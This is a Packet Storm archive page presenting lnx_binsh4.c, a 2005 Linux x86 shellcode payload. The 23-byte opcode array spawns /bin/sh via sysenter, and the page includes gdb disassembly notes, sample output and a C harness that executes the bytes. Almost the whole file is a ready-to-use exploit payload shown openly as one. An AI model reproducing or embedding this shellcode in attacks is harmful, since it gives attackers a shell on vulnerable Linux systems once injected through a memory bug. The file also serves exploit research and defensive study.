exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lnx_binsh4.c

lnx_binsh4.c
Posted Sep 7, 2005
Authored by c0ntex, BaCkSpAcE

23 byte linux/x86 /bin/sh sysenter opcode array payload.

tags | x86, shellcode
systems | linux
SHA-256 | c6fcfb33ec9f6fc7239338c5b769cff2c18bd07163945629fb794f7efd19c361

lnx_binsh4.c

Change Mirror Download
/*
lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston,
MA 02111-1307 USA

*/

/*

Tested: fedora core 3 - c0ntex
fedora core 4 - BaCkSpAcE
debian SID - amnesia

execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80

(gdb) disas __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
0xffffe400 <__kernel_vsyscall+0>: push %ecx
0xffffe401 <__kernel_vsyscall+1>: push %edx
0xffffe402 <__kernel_vsyscall+2>: push %ebp
0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp
0xffffe405 <__kernel_vsyscall+5>: sysenter
0xffffe407 <__kernel_vsyscall+7>: nop
0xffffe408 <__kernel_vsyscall+8>: nop
0xffffe409 <__kernel_vsyscall+9>: nop
0xffffe40a <__kernel_vsyscall+10>: nop
0xffffe40b <__kernel_vsyscall+11>: nop
0xffffe40c <__kernel_vsyscall+12>: nop
0xffffe40d <__kernel_vsyscall+13>: nop
0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3>
0xffffe410 <__kernel_vsyscall+16>: pop %ebp
0xffffe411 <__kernel_vsyscall+17>: pop %edx
0xffffe412 <__kernel_vsyscall+18>: pop %ecx
0xffffe413 <__kernel_vsyscall+19>: ret
0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax)
0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax)
0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax)
0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax)
0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax)
0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax)
End of assembler dump.
(gdb) q

so we replace

int $0x80

instruction with

push %ecx
push %edx
push %ebp
mov %esp,%ebp
sysenter

which does make the shellcode slightly larger :/


804807a: 51 push %ecx
804807b: 52 push %edx
804807c: 55 push %ebp
804807d: 89 e5 mov %esp,%ebp
804807f: 0f 34 sysenter

$ ./lnx_binsh4

[-] Stack Pointer found -> [0xbfe0f0d8]
[-] Size of payload egg -> [23]
[-] Payload Begin -> [0x80496c0]
[-] Payload End -> [0x80496d7]

sh-3.00b$

*/

/*
Calling: execve(/bin/sh), exit(0)
*/


#include <stdio.h>

typedef char wikkid;

/* reduced shellcode size from 45 to 23 - BaCkSpAcE */
wikkid oPc0d3z[] = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";

unsigned long grab_esp()
{
__asm__("movl %esp,%eax");
}

int main(void)
{
unsigned long delta;
void (*pointer)();

delta = grab_esp();

fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta);
fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1);

pointer=(void*)&oPc0d3z;

while(pointer) {
fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer);
fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+23);
pointer();
}

_exit(0);
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close